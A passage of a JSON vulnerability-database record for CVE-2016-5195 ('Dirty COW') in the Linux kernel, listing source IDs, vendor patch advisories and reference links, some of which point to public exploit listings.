          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-5195",
        "trust": 1.8
      },
      {
        "db": "CERT/CC",
        "id": "VU#243144",
        "trust": 1.3
      },
      {
        "db": "JUNIPER",
        "id": "JSA10770",
        "trust": 1.3
      },
      {
        "db": "BID",
        "id": "93793",
        "trust": 1.3
      },
      {
        "db": "MCAFEE",
        "id": "SB10177",
        "trust": 1.0
      },
      {
        "db": "MCAFEE",
        "id": "SB10222",
        "trust": 1.0
      },
      {
        "db": "MCAFEE",
        "id": "SB10176",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "139287",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "139277",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "139923",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "139286",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "142151",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "139922",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/08/08/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/08/08/2",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2016/10/30/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2016/10/27/13",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/08/08/7",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2016/10/21/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/08/08/8",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2016/10/26/7",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2016/11/03/7",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/08/15/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/08/09/4",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2022/03/07/1",
        "trust": 1.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "40839",
        "trust": 1.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "40616",
        "trust": 1.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "40611",
        "trust": 1.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "40847",
        "trust": 1.0
      },
      {
        "db": "JUNIPER",
        "id": "JSA10774",
        "trust": 1.0
      },
      {
        "db": "JUNIPER",
        "id": "JSA10807",
        "trust": 1.0
      },
      {
        "db": "SECTRACK",
        "id": "1037078",
        "trust": 1.0
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-5195",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139337",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139255",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "141870",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139250",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5195"
      },
      {
        "db": "BID",
        "id": "93793"
      },
      {
        "db": "PACKETSTORM",
        "id": "139337"
      },
      {
        "db": "PACKETSTORM",
        "id": "139255"
      },
      {
        "db": "PACKETSTORM",
        "id": "141870"
      },
      {
        "db": "PACKETSTORM",
        "id": "139250"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "id": "VAR-201611-0386",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.7783290715384616
  },
  "last_update_date": "2024-07-23T19:42:17.676000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Red Hat: Important: kernel-rt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162110 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162124 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162128 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162126 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162106 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162127 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162120 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162132 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162118 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162098 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162105 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162133 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162107 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux-snapdragon vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3106-4"
      },
      {
        "title": "Ubuntu Security Notice: linux-raspi2 vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3107-2"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3107-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3104-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-raspi2 vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3106-3"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3105-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-trusty vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3105-2"
      },
      {
        "title": "Ubuntu Security Notice: linux-ti-omap4 vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3104-2"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3106-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-xenial vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3106-2"
      },
      {
        "title": "Cisco: Cisco TelePresence Video Communication Server Test Validation Script Issue",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20181107-vcsd"
      },
      {
        "title": "dirty-cow-toolkit",
        "trust": 0.1,
        "url": "https://github.com/roliboy/rootcow "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/yatt-ze/dirtycowandroid "
      },
      {
        "title": "polaris-dict-a63-arch",
        "trust": 0.1,
        "url": "https://github.com/zaoqi/polaris-dict-a63-arch "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-362",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.3,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619"
      },
      {
        "trust": 1.3,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1384344"
      },
      {
        "trust": 1.3,
        "url": "https://source.android.com/security/bulletin/2016-12-01.html"
      },
      {
        "trust": 1.3,
        "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161207-01-dirtycow-en"
      },
      {
        "trust": 1.3,
        "url": "https://github.com/dirtycow/dirtycow.github.io/wiki/pocs"
      },
      {
        "trust": 1.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2118.html"
      },
      {
        "trust": 1.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2120.html"
      },
      {
        "trust": 1.3,
        "url": "https://www.kb.cert.org/vuls/id/243144"
      },
      {
        "trust": 1.3,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20161026-linux"
      },
      {
        "trust": 1.3,
        "url": "https://github.com/dirtycow/dirtycow.github.io/wiki/vulnerabilitydetails"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/security/vulnerabilities/2706661"
      },
      {
        "trust": 1.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2110.html"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-5195"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-3106-3"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-3106-1"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-3104-1"
      },
      {
        "trust": 1.0,
        "url": "http://fortiguard.com/advisory/fg-ir-16-063"
      },
      {
        "trust": 1.0,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10770"
      },
      {
        "trust": 1.0,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774"
      },
      {
        "trust": 1.0,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10807"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00034.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00035.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00036.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00038.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00039.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00040.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00045.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00048.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00049.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00050.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00051.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00052.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00053.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00054.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00055.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00056.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00057.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00058.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00063.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00064.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00065.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00066.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00067.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00072.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00033.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00100.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00041.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/139277/kernel-live-patch-security-notice-lsn-0012-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/139286/dirtycow-linux-kernel-race-condition.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/139287/dirtycow-local-root-proof-of-concept.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/139922/linux-kernel-dirty-cow-ptrace_pokedata-privilege-escalation.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/139923/linux-kernel-dirty-cow-ptrace_pokedata-privilege-escalation.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/142151/kernel-live-patch-security-notice-lsn-0021-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2098.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2105.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2106.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2107.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2124.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2126.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2127.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2128.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2132.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2133.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.debian.org/security/2016/dsa-3696"
      },
      {
        "trust": 1.0,
        "url": "http://www.kernel.org/pub/linux/kernel/v4.x/changelog-4.8.3"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2016/10/21/1"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2016/10/26/7"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2016/10/27/13"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2016/10/30/1"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2016/11/03/7"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/03/07/1"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/08/08/1"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/08/08/2"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/08/08/7"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/08/08/8"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/08/09/4"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2022/08/15/1"
      },
      {
        "trust": 1.0,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/539611/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/540252/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/540344/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/540736/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/archive/1/539611/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/archive/1/540252/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/archive/1/540344/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/archive/1/540736/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/bid/93793"
      },
      {
        "trust": 1.0,
        "url": "http://www.securitytracker.com/id/1037078"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3104-2"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3105-1"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3105-2"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3106-2"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3106-4"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3107-1"
      },
      {
        "trust": 1.0,
        "url": "http://www.ubuntu.com/usn/usn-3107-2"
      },
      {
        "trust": 1.0,
        "url": "https://access.redhat.com/errata/rhsa-2017:0372"
      },
      {
        "trust": 1.0,
        "url": "https://bto.bluecoat.com/security-advisory/sa134"
      },
      {
        "trust": 1.0,
        "url": "https://bugzilla.suse.com/show_bug.cgi?id=1004418"
      },
      {
        "trust": 1.0,
        "url": "https://dirtycow.ninja"
      },
      {
        "trust": 1.0,
        "url": "https://github.com/torvalds/linux/commit/19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-c05352241"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbgn03707en_us"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbgn03722en_us"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbgn03742en_us"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbgn03761en_us"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05341463"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05347541"
      },
      {
        "trust": 1.0,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05352241"
      },
      {
        "trust": 1.0,
        "url": "https://help.ecostruxureit.com/display/public/uadco8x/struxureware+data+center+operation+software+vulnerability+fixes"
      },
      {
        "trust": 1.0,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10176"
      },
      {
        "trust": 1.0,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10177"
      },
      {
        "trust": 1.0,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10222"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/e7m62srp6czlj4zxcrzkv4wplqbsr7dt/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/nwmdlbwmgzkfhmrj7quqvcerp5qhdb6w/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/w3aprvdvpdbxlh4dc5ukzvcr742mjim3/"
      },
      {
        "trust": 1.0,
        "url": "https://people.canonical.com/~ubuntu-security/cve/2016/cve-2016-5195.html"
      },
      {
        "trust": 1.0,
        "url": "https://security-tracker.debian.org/tracker/cve-2016-5195"
      },
      {
        "trust": 1.0,
        "url": "https://security.netapp.com/advisory/ntap-20161025-0001/"
      },
      {
        "trust": 1.0,
        "url": "https://security.paloaltonetworks.com/cve-2016-5195"
      },
      {
        "trust": 1.0,
        "url": "https://source.android.com/security/bulletin/2016-11-01.html"
      },
      {
        "trust": 1.0,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20181107-vcsd"
      },
      {
        "trust": 1.0,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1753-security-advisory-0026"
      },
      {
        "trust": 1.0,
        "url": "https://www.exploit-db.com/exploits/40611/"
      },
      {
        "trust": 1.0,
        "url": "https://www.exploit-db.com/exploits/40616/"
      },
      {
        "trust": 1.0,
        "url": "https://www.exploit-db.com/exploits/40839/"
      },
      {
        "trust": 1.0,
        "url": "https://www.exploit-db.com/exploits/40847/"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5195"
      },
      {
        "trust": 0.3,
        "url": "https://github.com/amluto/vulnerabilities/blob/master/others/cve-2016-5195/test_cve-2016-5195.c"
      },
      {
        "trust": 0.3,
        "url": "https://dirtycow.ninja/"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "https://googlechromereleases.blogspot.in/2016/10/stable-channel-update-for-chrome-os_26.html"
      },
      {
        "trust": 0.3,
        "url": "https://kb.vmware.com/selfservice/microsites/search.do?language=en_us\u0026cmd=displaykc\u0026externalid=2147515"
      },
      {
        "trust": 0.3,
        "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10770\u0026actp=rss"
      },
      {
        "trust": 0.3,
        "url": "https://help.virtuozzo.com/customer/portal/articles/2613795"
      },
      {
        "trust": 0.3,
        "url": "https://help.virtuozzo.com/customer/portal/articles/2613794"
      },
      {
        "trust": 0.3,
        "url": "http://kb.odin.com/en/129683"
      },
      {
        "trust": 0.3,
        "url": "https://github.com/timwr/cve-2016-5195"
      },
      {
        "trust": 0.3,
        "url": "https://forum.proxmox.com/threads/cve-2016-5195-dirty-cow.29908/"
      },
      {
        "trust": 0.3,
        "url": "https://centos.org/forums/viewtopic.php?f=51\u0026p=252514"
      },
      {
        "trust": 0.3,
        "url": "https://www.cloudlinux.com/kernelcare-blog/entry/dirty-cow-vulnerability-the-fix-is-coming"
      },
      {
        "trust": 0.3,
        "url": "https://security-tracker.debian.org/tracker/dla-670-1"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05347541"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05352241"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05341463"
      },
      {
        "trust": 0.3,
        "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1024478"
      },
      {
        "trust": 0.3,
        "url": "https://securityadvisories.paloaltonetworks.com/home/detail/73"
      },
      {
        "trust": 0.3,
        "url": "https://coreos.com/blog/cve-2016-5195.html"
      },
      {
        "trust": 0.3,
        "url": "https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=9691eac5593ff1e2f82391ad327f21d90322aec1"
      },
      {
        "trust": 0.3,
        "url": "https://gryzli.info/2016/10/21/protect-cve-2016-5195-dirtycow-centos-7rhel7cpanelcloudlinux/"
      },
      {
        "trust": 0.3,
        "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995667"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3104-1/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3105-1/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3105-2/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3106-1/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3106-2/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3106-3/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3106-4/"
      },
      {
        "trust": 0.3,
        "url": "https://www.ubuntu.com/usn/usn-3107-1/"
      },
      {
        "trust": 0.3,
        "url": "https://help.virtuozzo.com/customer/en/portal/articles/2613793"
      },
      {
        "trust": 0.3,
        "url": "http://www.vmware.com/security/advisories/vmsa-2016-0018.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-7039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1029.36"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/security_bulletin_archive"
      },
      {
        "trust": 0.1,
        "url": "https://www.hpe.com/info/report-security-vulnerability"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/subscriber_choice"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbgn03722en_us"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.2.0-113.155"
      }
    ],
    "sources": [
      {
        "db": "BID",
